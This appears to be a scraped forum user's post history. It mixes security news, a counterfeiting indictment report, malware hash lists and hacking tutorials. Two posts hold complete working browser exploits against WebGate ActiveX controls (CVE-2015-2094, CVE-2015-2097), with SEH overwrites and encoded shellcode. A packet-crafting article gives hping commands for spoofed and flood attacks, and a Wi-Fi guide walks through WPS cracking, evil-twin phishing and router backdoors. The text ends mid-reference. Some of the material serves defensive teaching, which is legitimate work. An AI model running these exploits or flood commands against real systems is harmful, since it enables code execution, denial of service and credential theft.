    Towards making Bittorrent anonymous and impossible to shut down. We use our own dedicated Tor-like network for anonymous torrent downloading. We implemented and enhanced the Tor protocol specifications plus merged them with Bittorrent streaming. More info: https://github.com/Tribler/tribler/wiki Tribler includes our own Tor-like onion routing network with hidden services based seeding and end-to-end encryption, detailed specs: https://github.com/Tribler/tribler/wiki/Anonymous-Downloading-and-Streaming-specifications The aim of Tribler is giving anonymous access to online (streaming) videos. We are trying to make privacy, strong cryptography and authentication the Internet norm. Tribler currently offers a Youtube-style service. For instance, Bittorrent-compatible streaming, fast search, thumbnail previews and comments. For the past 9 years we have been building a very robust Peer-to-Peer system. Today Tribler is robust: "the only way to take Tribler down is to take The Internet down" (but a single software bug could end everything). We make use of submodules, so remember using the --recursive argument when cloning this repo. https://github.com/Tribler/tribler Site: Tribler - Privacy using our Tor-inspired onion routing
  10. Aerosol
    Four U.S. citizens have been indicted by a federal grand jury in Pittsburgh for their alleged roles in an international Federal Reserve Notes (FRN) counterfeiting operation based out of Uganda, according to a Thursday release from the Department of Justice. Ryan Gustafson – who is currently incarcerated and facing charges in Uganda – is charged alongside Zackary Ruiz, Jeremy Miller, and Michael Lin with conspiracy and counterfeiting acts committed in and out of the U.S. Gustafson allegedly set up Community-X in December 2013, a website on the dark web that was “dedicated to the manufacturing, selling, buying, distribution and passing of counterfeit [FRNs], which [Gustafson] claimed to have manufactured,” the release stated, citing the indictment. The Community-X website evolved in September 2014 after Gustafson allegedly split it into two separate sites – one a Community-X HQ with controlled access, and another a Community-X Recruitment Center that was publicly accessible. Gustafson, Ruiz and Miller were allegedly active members of both sites, while Lin was only a member of the Recruitment Center, the Justice Department noted in the release. “Gustafson and others allegedly sold these [ugandan-made] counterfeit FRNs to purchasers in the U.S.,” the release said. “From December 2013 through February 2014, an associate of Gustafson sent DHL packages containing these counterfeit FRNs to individuals in the U.S. After February 2014, Gustafson had the counterfeit FRNs smuggled into the U.S. by hiding the counterfeit FRNs in glued together pages of fake charity pamphlets.” Ruiz, Miller and Lin allegedly had different roles in the operation, the Justice Department release indicated. Ruiz allegedly unpacked the counterfeit FRNs and – along with Miller – treated, prepared and mailed the counterfeit FRNs via the U.S. Postal Service to re-shippers and purchasers. Lin was allegedly a purchaser, and also helped in passing the phony notes in casinos. “The indictment alleges more than $1.4 million in counterfeit FRNs have been seized and passed worldwide, both overseas and in the U.S. as part of this scheme,” the release said. The maximum prison sentence for a conspiracy count is five years, the maximum prison sentence for a conspiracy to commit money laundering count is 20 years, and the maximum prison sentence for each passing and receiving counterfeit money count is also 20 years, the Justice Department noted. Source
  11. Aerosol
    Firefox-maker Mozilla has joined Google in refusing to recognize SSL certificates issued by the China Internet Network Information Centre (CNNIC). This comes after a security biz in Egypt used a CNNIC-issued intermediate certificate to create unauthorized SSL certs that could be used to trick people into connecting to bogus, password-stealing Gmail.com or Google.com websites. Google, and now Moz, are outraged by CNNIC's sloppiness in the case. CNNIC is run by the Middle Kingdom's government, and handles the .cn domain name registry, IP address allocation and other things as well as issuing SSL certificates for encrypted websites via intermediaries. "After reviewing the circumstances and a robust discussion on our public mailing list, we have concluded that CNNIC's behaviour in issuing an unconstrained intermediate certificate to a company with no documented PKI practices and with no oversight of how the private key was stored or controlled was an 'egregious practice' as per Mozilla's CA Certificate Enforcement Policy," the Mozilla security team wrote in a Thursday blog post. As a consequence of the incident, all Mozilla products – including the Firefox web browser and the Thunderbird email client, among others – will be updated so that all CNNIC-based certificates issued on or after April 1, 2015 are considered untrusted. Mozilla said it also plans to ask CNNIC for a comprehensive list of all of its current valid certificates. Any certificates issued before April 1 that are not included on this whitelist will also be subject to potential "further action." The move comes following a similar action by Google, which said on Wednesday that it would stop recognizing the CNNIC certificate authority in a future update to its Chrome browser. As a result of these actions, Chrome and Firefox users who try to connect via encrypted HTTPS to websites that use CNNIC-issued SSL certificates will see alert messages warning them that their connections may not be secure – even for online banks, e-commerce shops, and other sites that manage sensitive information. CNNIC, which manages both China's .cn country code top-level domain and the system of internationalized domain names that contain Chinese characters, issued a declaration on Thursday condemning Google's ban: 1. The decision that Google has made is unacceptable and unintelligible to CNNIC, and meanwhile CNNIC sincerely urge that Google would take users' rights and interests into full consideration. 2. For the users that CNNIC has already issued the certificates to, we guarantee that your lawful rights and interests will not be affected. Mozilla added, though, that CNNIC could regain its standing but only after proving that it could be trusted with the responsibility of managing a root certificate authority. "CNNIC may, if they wish, re-apply for full inclusion in the Mozilla root store and the removal of this restriction, by going through Mozilla's inclusion process after completing additional steps that the Mozilla community may require as a result of this incident," the nonproifit's security team said. Source
  12. Aerosol
    <html> <!-- # Exploit Title: WebGate WinRDS PlaySiteAllChannel Stack Buffer Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2094 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub PlaySiteAllChannel ( ByVal SiteSerialNumber As String )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <script> var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<128; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.PlaySiteAllChannel(fbuff) </script> </html> Source
  13. Aerosol
    Some sort of Middle Eastern APT apparently. Volatile Cedar - Analysis of a Global Cyber Espionage Campaign | Check Point Blog Sinkholing Volatile Cedar DGA Infrastructure - Securelist Attached: 034e4c62965f8d5dd5d5a2ce34a53ba9 08c988d6cebdd55f3b123f2d9d5507a6 184320a057e455555e3be22e67663722 1d4b0fc476b7d20f1ef590bcaa78dc5d 1dcac3178a1b85d5179ce75eace04d10 22872f40f5aad3354bbf641fe90f2fd6 2783cee3aac144175fef308fc768ea63 29eca6286a01c0b684f7d5f0bfe0c0e6 2b9106e8df3aa98c3654a4e0733d83e7 306d243745ba53d09353b3b722d471b8 3f35c97e9e87472030b84ae1bc932ffc 44b5a3af895f31e22f6bc4eb66bd3eb7 4f8b989bc424a39649805b5b93318295 5b505d0286378efcca4df38ed4a26c90 5ca3ac2949022e5c77335f7e228db1d8 5d437eb2a22ec8f37139788f2087d45d 61b11b9e6baae4f764722a808119ed0c 66e2adf710261e925db588b5fac98ad8 6f11a67803e1299a22c77c8e24072b82 7031426fb851e93965a72902842b7c2c 740c47c663f5205365ae9fb08adfb127 7cd87c4976f1b34a0b060a23faddbd19 7dbc46559efafe8ec8446b836129598c 826b772c81f41505f96fc18e666b1acd 96b1221ba725f1aaeaaa63f63cf04092 981234d969a4c5e6edea50df009efedd 9a5a99def615966ea05e3067057d6b37 ab3d0c748ced69557f78b7071879e50a c19e91a91a2fa55e869c42a70da9a506 c7ac6193245b76cc8cebc2835ee13532 c898aed0ab4173cc3ac7d4849d06e7fa c9a4317f1002fefcc7a250c3d76d4b01 d2074d6273f41c34e8ba370aa9af46ad e6f874b7629b11a2f5ed3cc2c123f8b6 ea53e618432ca0c823fafc06dc60b726 eb7042ad32f41c0e577b5b504c7558ea edaca6fb1896a120237b2ce13f6bc3e6 f58f03121eed899290ed70f4d19af307 Download Source
  14. Aerosol
    <html> <!-- # Exploit Title: WESP SDK ChangePassword Stack Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/bbs/zboard.php?id=sdk_pds_eng # Version: WESP SDK (package version 1.2) # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPConfig.dll" prototype = "Function ChangePassword ( ByVal oldPwd As String , ByVal newPwd As String ) As Integer" progid = "WESPCONFIGLib.UserItem" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:9B61891E-D876-476E-B1E8-AA662F332004' id='target'> </object> <script> var arg1 = ""; var arg2 = "PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<248; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; //WESPConfig.dll(0x10022f35 = pop pop pop ret) var seh = "\x3d\x2f\x02\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.ChangePassword(fbuff ,arg2); </script> </html> Source
  15. Aerosol
    Ba deja imi e dor de filelist oricum in 2/3 zile o sa fie up 100%.
  16. Aerosol
    Packet crafting is the art of creating a packet according to various requirements to carry out attacks and to exploit vulnerabilities in a network. It’s mainly used to penetrate into a network’s structure. There are various vulnerability assessment tools used to craft such packets. As a coin has two sides, these tools could be used by hackers to find the vulnerabilities of a targeted system. Crafting is technically advanced and a complex type of vulnerability exploitation, and it’s difficult to detect and diagnose. Steps Involved in Packet Crafting The idea behind crafting is to try to simulate an attack and to identify the properties of a network. They are commonly used to invade firewalls and intrusion detection software. The following are the steps involved in packet crafting: Packet Assembly: This is the first step involved in packet crafting. In this process, the attacker selects the network to be cracked, collects the possible vulnerability information and creates the packet. The packet should be designed in such a way that it should be invisible while passing through a network. For example, for a packet to be invisible, the source address could be spoofed before sending it to a network. Packet Editing: In this step, the packets are tested before sending. The packets are edited in such a way that maximum information could be retrieved by injecting a minimum number of packets. Packet Playing: When the packets are ready, packet playing sends them to the targeted machine and collects the resultant packets for further analysis. If the required information is not obtained, the attacker again moves to the editing phase to modify the packet to obtain the required result. Packet Analysis: The sent packets are received by the attacker and they are analyzed to extract the information. Various sniffing tools like Wireshark, tcpdump, dsniff, etc. are used for this purpose. This step gives a route to the targeted system, or at least gives attackers enough data to tune up the attack. Tools For Packet Crafting: Hping, Nemesis, Netcat, Scapy, Socat Let’s carry out a test to understand the creation and working of a crafted packet and its effect on a firewall. Test Requirements Two Machines (One with Hping and Other with Snort installed). Working connection between two machines. Hping This is a utility that helps us to assemble and send ICMP, UDP or TCP packets and then display the results. It’s similar to the ping command, but it offers far more options to customize the packet to be sent. This helps to map the firewall set rules of a targeted system. Snort Sort is a free network intrusion detection and prevention software. It helps us to carry out real time traffic analysis packet logging, protocol analysis, content searching, etc. on a network. Testing Figure 1: Packet Crafting test setup Now we are going to check how a packet can be crafted from a system using Hping, and how it can be customized to be invisible in a network. We are using Snort as the IDS in the target machine. This could prove that packet crafting is a serious issue that should be studied to prevent attacks. Firstly install Hping on the source machine. It’s a command line multi-platform software. We are using two Linux machines for the test. The installation package could be downloaded from various websites. The next step is to install the intrusion detection software at the destination end. Download the latest version Snort with Winpcap and install it on the machine. Winpcap is a driver that helps in collecting packets. After setting up two machines, establish a connection between the two machines to transfer the packets. Check the connection before sending the packets. These are the steps to setup the test environment. Now we have to craft the packet using Hping. In Hping there are various arguments to modify the packet to be sent according to the requirement. These could be obtained from the manual page of Hping. Before sending the packet, determine the address of the target machine. Here it is 192.168.0.10. Now write the command for packet creation. Hping is a command line software. For creating the packets, the commands should be given in a perfect way so that the packet penetrates into the targeted system without being detected. An example is given below: hping 192.168.0.10 –udp –spoof 192.168.1.150 The packets are sent to the UDP port of machine 192.168.0.10 with a spoofed source IP of 192.168.1.150. Figure 2: Spoofing to UDP port. Figure 3: Spoofed address on target system hiding original address Packet crafting could be used to carry out DOS attacks to a targeted machine. This could be done by flooding packets to a predetermined port. The number of packets reaching the port is beyond the managing capacity of that port. This results in the failure of the system and finally becomes non-responsive to any request made to that particular system. Port Scanning Before sending a packet to the system Hping could be used to carry out a port scan. This helps the attacker to get the information on available open ports to carry out attack easily. The weakest port is selected to gain access to the system. hping3 -S 192.168.0.10 -p 80 -c 2 This command scans port number 80 of machine with IP 192.168.0.10. There are even commands to scan the complete ports in a machine. This will give the attacker the complete status of the ports in a system. hping 192.168.0.10 –S -p 22 –rand-source –flood This command floods the port number 22 of the mentioned machine. As the flooding starts, the machine becomes non responsive. When the flooding is stopped, the machine comes back to its normal state. Figure 4: Command for flooding a machine Figure 5: Result displayed by Snort after flooding. We can see from the above image that a large number of packets have been dumped to the targeted machine within a small amount of time. The IDS software does not detect the packets while the flooding is in process. But as soon as the flooding is stopped, Snort displays only the number of packets received. The traffic created by flooding the packets cannot be handled by the system and becomes non-responsive. No Signatures are generated during the process. DNS and ICMP Packet Crafting Domain Name System is the system responsible for resolving domain names. DNS uses ports 53 UDP for normal operations and can enlist port 53 TCP for zone transfers and other oversized replies. Once the address is entered into the URL, the browser will try to resolve the IP. If the address is not known, then a DNS request will be sent to the DNS server configured on the client. We could craft such a packet using Hping so that the firewall does not block the packet. hping -2 –p 53 -E data.dns -d 31 192.168.0.10 Here the packet is sent to the port number 53 of the target (192.168.0.10), with the packet containing a file called “data.dns”. The packet size has also been specified as 31. Figure 6: Sending a file to target’s DNS port When sending a data file through Hping, the IDS used in the target’s machine does not detect the presence of the attached file. It only displays the total number of packets transmitted and received. Even tough it shows unreachable, the packets are received at the target location. Hping can also be used to send ICMP (Internet Control Message Protocol) packets. ICMP packets are usually used to troubleshoot networks and for gathering basic information. These packets could be used to check whether a host is alive or not. In most of the firewalls, packets like ICMP and DNS request have the ability to pass by. These crafted ICMP packets helps us to pass through the firewall. At the senders end, we have to specify the type of packet, destination and other details for proper communication. hping 192.168.0.11 –d 100 –icmp –file /data.dns Here the file “data.dns” is sent to the target 192.168.0.11 using an ICMP packet. Figure 7: File sent using ICMP packet Using such crafted packets, a traffic firewall could be breached. From the above test, we can agree to the fact that packet crafting is a serious issue that should be taken care of. References Snort: 5 Steps to Install and Configure Snort on Linux LINUX HELP ALL: INSTALLING AND CONFIGURING SNORT ON REDHAT/CENTOS v5.5 Cyber Attacks Explained: Packet Crafting - Open Source For You Article : Cyber Security Packet crafting : Ethical Hacking Penetration Test Pune,India - Valency Networks Tools for creating TCP/IP packets | Linux Blog http://www.securitybistro.com/?p=8881 Source
  17. Aerosol

    N00bs CTF

    Aerosol replied to Usr6's topic in Challenges (CTF)

    Se pare ca au postat solutia: n00bs CTF Labs - Solutions! - InfoSec Institute ( asta pentru cei interesati )
  18. Aerosol
    While the access points in organizations are usually under the protection of organization-wide security policies, home routers are less likely to be appropriately configured by their owners in absence of such central control. This provides a window of opportunity to neighboring Wi-Fi hackers. We talk about hacking a neighbor’s Wi-Fi since proximity to the access point is a must for wireless hacking—which is not an issue for a neighbor with an external antenna. With abundance of automated Wi-Fi hacking tools such as ‘Wifite’, it no longer takes a skilled attacker to breach Wi-Fi security. Chances are high that one of your tech-savvy neighbors would eventually exploit a poorly configured access point. The purpose may or may not be malicious; sometimes it may simply be out of curiosity. However, it is best to be aware of and secure your Wi-Fi against attacks from such parties. Tools Used: Aircrack-ng Suite Wireshark Reaver Bully WiFiPhisher Nessus Vulnerability Scanner Attacks Against Access Point Password The choices of attack for a neighboring Wi-Fi hacker vary with different configurations of Wi-Fi access points. Specific Wi-Fi security standards are associated with particular security weaknesses that the attacker would target. Open Hotspots Although rare, open Wi-Fi access points are still extant in certain homes. When open access points are deployed in homes, it could be out of ‘generosity’ towards neighbors or sheer insouciance towards security, or both. It is observed that home users with unlimited bandwidth and data are more likely to leave their access point unsecured, unaware of the security implications. Attack: Open Wi-Fi networks do not encrypt data packets over wireless channels. This means that anyone with a packet capture utility can read unencrypted HTTP, email, and FTP traffic. In this case, we captured the traffic pertaining to an open Wi-Fi on channel 1 using ‘Airodump-ng’, and analyzed the captured file in Wireshark, which revealed that a user on the network was logging into his (demo) bank account [Figure 1]. Figure 1 While it is highly unlikely today that a banking website would lack an HTTPS link, this is meant to demonstrate the dangers of using unencrypted Wi-Fi along with unencrypted protocols such as HTTP, FTP, SMTP, etc. Defense: Never leave the access point ‘open’ or unsecured. Access the control panel of the wireless router and configure it to use a complex WPA2 key (explained later in this paper). If you insist on using an open access point, consider using ‘HTTPS Everywhere‘ while browsing. WEP IV Collisions WEP is an outdated security standard vulnerable to statistical attacks due to IV collisions. It offers a false sense of security, and in the wake of WPA2, it is hard to think of a reason why one would want to use it. Attack: Since WEP cracking has been covered on myriad blogs and websites already, we will refrain from going into details of attacks against it. For the intricacies of how such attacks are performed, you may visit this page. Defense: Since the use of WEP is now deprecated due to serious security flaws, you should use WPA2 (AES) instead. WPS Based Attacks WPS PIN is an 8 digit number pertaining to the wireless router. It was meant to liberate users from having to remember complex WPA passwords. The idea was that since WPA is susceptible to dictionary attacks, the user would set a complex WPA passphrase and deploy WPS in order to avoid having to remember the passphrase. After supplying the correct WPS PIN to the router, it would hand over the configuration details to the client—which includes the WPA password. Brute forcing the WPS PIN WPS was implemented incorrectly: Firstly, the last digit of the PIN was a checksum which means the effective size of a WPS PIN is only 7 digits. Moreover, the registrar (router) checks the PIN in 2 parts. This means the first part of 4 digits would have 10,000 possible combinations, and the second part of 3 digits would have 1,000 possible combinations. Hence, the attacker would require only 11,000 attempts, in the worst case, to brute force the PIN—which is very feasible. Here, during an experiment, we were able to crack the WPS PIN in under 6 hours using the popular tool ‘reaver’ [Figure 2]. Figure 2 Defense: Make sure you have the latest firmware installed and that your router has a WPS lockout policy (AP rate limiting) after a certain number of unsuccessful attempts. In absence of such lockout policy, turn off WPS in your router. Known WPS PIN The WPS PIN attack becomes incredibly effective and short if the attacker somehow has knowledge of a neighbor’s WPS PIN. Attack: How does the hacker (in this case a neighbor) know the WPS PIN? The PIN is usually written on the bottom of the wireless router. The (evil) neighbor could quickly glance at it during a social visit. Additionally, access points may be left ‘open’ for a certain duration while the user is implementing some router configuration changes or performing a factory reset. This offers a window of opportunity to the attacker to quickly connect to the router, access the control panel (using default credentials), and take note of the WPS PIN [Figure 3]. Figure 3 Once the hacker gains knowledge of the PIN, it could be used to uncover a complex WPA passphrase in seconds. Defense: Scrub off the WPS PIN on the bottom of the wireless router, and avoid leaving your access point ‘open’ at any time. Furthermore, most updated routers will allow the owner to change the WPS PIN from the control panel [Figure 4]. Generate a new WPS PIN periodically. Figure 4 Dictionary Attacks on WPA Handshakes As long as strong, complex WPA passphrases are used to protect the access points, dictionary attacks on WPA handshakes are not really a concern. However, every once in a while a user will configure a dictionary word as the WPA password for the sake of simplicity. This leads to successful recovery of passwords from the WPA 4-way handshakes using dictionary attacks. Attack: The attacker seeks to capture the WPA 4-way handshake between a legitimate client and the access point. A dictionary attack is used to recover the plaintext passphrase from this WPA handshake. For the intricacies of this attack, you can visit this page. Defense: Configure complex passphrases that are a combination of special characters, numbers, letters, etc. Never use personal information such as your phone number as the WPA passphrase, as it might be guessed. Wi-Fi Phishing When all else fails, social engineering could always be relied upon to exploit what is often the weakest link in the chain of security—the human element. Phishing is a type of social engineering attack where the user of the Wi-Fi access point could be tricked into revealing the password. Attack: Traditionally, such phishing attacks are carried out over emails; however, in this case even a naïve user would get suspicious if the attacker asks for a WPA password over email. Hence, the best approach is to launch an evil twin attack, make the user join the fake access point, and ask for the password. WiFiPhisher, a python tool, implements this approach. First, the tool prepares the attacker’s machine for the attack. This involves setting up the HTTP and HTTPS servers, detecting the wireless interfaces (wlan0 and wlan1), putting one of these interfaces in monitor mode, and managing DHCP services for IP address allotment [Figure 5]. Figure 5 The tool then detects the Wi-Fi access points in the vicinity and lists them for the attacker [Figure 6]. The attacker then specifies the access point to attack. Figure 6 After the attacker chooses the access point, the tool clones the ESSID and attempts to jam the authentic access point. This is important since the attacker wants the users to get de-authenticated from the legitimate network and connect to the evil twin. If the users are not knocked off their authentic access point, or if the attacker’s evil twin access point is too far away for the users to get a strong signal from it, then the attack does not work, since no users will connect to the evil twin. This evil twin access point is now waiting for clients to connect. When a client connects, the attacker is notified that an IP address is allocated to a client. In this case, we notice that an Android device has connected to the evil twin [Figure 7]. Figure 7 Now, it is just a matter of time before this client attempts to access a webpage online. When the client requests a webpage, our HTTP or HTTPS server would serve the phishing page instead. For instance, here the client, the Android device, requested to connect to Google and was served the phishing page instead [Figure 8]. Figure 8 The attacker is notified of the client’s request for the web page and knows now that the client has been served the phishing page [Figure 9]. Figure 9 Moment of truth: either the user gets suspicious and closes the connection, or falls for the con and provides the WPA password as requested [Figure 8]. The user is redirected to an “upgrade-in-progress” page after he submits the WPA password [Figure 10]. Figure 10 Meanwhile, the password is revealed to the attacker over the console [Figure 11]. Figure 11\ The user may end up revealing the password due to the following reasons: The user surmises that he is connected to his own legitimate access point. The phishing page is intentionally cloaked to appear as an authentic router page. User has a curiosity towards the open access point with the same ESSID. Defense: Always be wary of any page asking for a password. Avoid giving out the WPA password over shady pages. Aftermath: The Hacker is in Once the attacker has obtained the password and is connected to the access point, he would attempt to explore further. The first point of interest is the router’s control panel. Default credentials: A surprising number of home users do not change the default credentials to their router’s management panel. Router default credentials can be obtained on the Internet, and subsequent access to this management console grants the hacker further privileges on the network. Digging PIN and passwords: Once inside the Wi-Fi management panel, the hacker would note down the WPS PIN and any hidden password for future use. “Hidden” passwords behind asterisks are easy to uncover. For instance, we uncover the ‘admin’ and ‘user’ passwords germane to a router using ‘Inspect element’ in Chrome [Figure 12]. Figure 12 Exploiting clients: Since the attacker is now a part of the local network, he can initiate local scans to glean details of clients, services, ports etc. This allows the attacker to target vulnerabilities pertaining to clients connected to the network [Figure 13]. Figure 13 DNS Manipulation: If the attacker has secured access to the router’s control panel, he can modify the DNS configuration which has severe implications on security. For example, the attacker could plant a fake DNS entry to redirect clients using an online banking service to a rogue server serving phishing pages. Maintaining Access: A persistent neighboring hacker requiring prolonged access to the Wi-Fi access point would want to ensure continued access even after the current password or security protocol is modified later by the owner. Accordingly, the hacker would access the router control panel and take note of the WPS PIN [Figure 4]. More advanced attackers would try to plant a backdoor in the router firmware, such as a master password, that would allow them to access the Wi-Fi at will in the future. However, this involves flashing custom firmware, such as DD-WRT, to the router. DD-WRT provides open source router firmware for numerous wireless router models. The attacker would download the appropriate DD-WRT firmware, modify the source code to include a master password or backdoor, and flash this firmware to the router using the router control panel DDW1 [Figure 14]. Figure 14 Conclusion The purpose of this paper is not to condone hacking your neighbors’ Wi-Fi, rather to apprise owners of common security weaknesses in Wi-Fi configurations and suggest relevant mitigation. “Since I have unlimited data and bandwidth, I do not mind if an unknown person is using my Wi-Fi.” While this generosity is worthy of some appreciation, bandwidth and data usage are not the only concerns when your Wi-Fi is accessed by an unauthorized party. Consider the case where a neighbor attempted to indict the owners after cracking their WEP key and accessing child pornography websites. Since it is your network, the ISP and authorities turn to you while investigating illicit activities. Router manufacturers provide GUI control panels that make it easy for owners to configure their access points. It is best to utilize these interfaces for secure configuration of access points that are capable of thwarting attacks from neighbors. References [1] DD-WRT. DD-WRT. [Online]. Development - DD-WRT Wiki [2] Nikita Borisov, 